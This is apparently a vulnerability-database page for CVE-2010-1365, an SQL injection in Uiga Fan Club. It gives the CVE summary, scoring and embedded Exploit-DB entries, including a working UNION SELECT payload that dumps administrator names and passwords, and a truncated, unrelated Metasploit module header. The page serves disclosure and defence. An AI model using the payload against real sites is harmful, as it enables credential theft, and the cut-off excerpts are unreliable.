CVE-2010-1365
published 2010-04-13CVE-2010-1365: SQL injection vulnerability in index.php in Uiga Fan Club, as downloaded on 20100310, allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in index.php in Uiga Fan Club, as downloaded on 20100310, allows remote attackers to execute arbitrary SQL commands via the id parameter in a photos action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| uiga | fan_club | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-1365 Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_officescan.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'metasm'
class Metasploit3 'Trend Micro OfficeScan Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Trend Micro OfficeScan
cgiChkMasterPwd.exe (running with SYSTEM privileges).
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-1365' ],
[ 'OSVDB', '
Exploit-DB
Uiga Fan Club - SQL Injection
exploitdb·2010-03-22
CVE-2010-1365 Uiga Fan Club - SQL Injection
Uiga Fan Club - SQL Injection
---
# Exploit Title: Uiga Fan Club SQL Injection Vulnerability
# Date: 22/03/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A
__ _ __ _
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___
\ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
Exploit :
http://site/index.php?view=photos&id=[SQLi]
Example :
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--
#Sioma Labs
#siomalabs.com
#Sioma Agent 154
Exploit-DB
Uiga Fan Club - 'index.php' SQL Injection
exploitdb·2010-02-28
CVE-2010-1365 Uiga Fan Club - 'index.php' SQL Injection
Uiga Fan Club - 'index.php' SQL Injection
---
----------------------------Information------------------------------------------------
+Name : Uigafanclub index.php SQL Injection
+Autor : Easy Laster
+Date : 28.02.2010
+Script : Uigafanclub
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
+Vulnera
No writeups or analysis indexed.
http://4004securityproject.wordpress.com/2010/02/28/uigafanclub-index-php-sql-injection/http://packetstormsecurity.org/1002-exploits/uigafc-sql.txthttp://secunia.com/advisories/38756http://www.exploit-db.com/exploits/11600http://www.vupen.com/english/advisories/2010/0487http://4004securityproject.wordpress.com/2010/02/28/uigafanclub-index-php-sql-injection/http://packetstormsecurity.org/1002-exploits/uigafc-sql.txthttp://secunia.com/advisories/38756http://www.exploit-db.com/exploits/11600http://www.vupen.com/english/advisories/2010/0487
2010-04-13
Published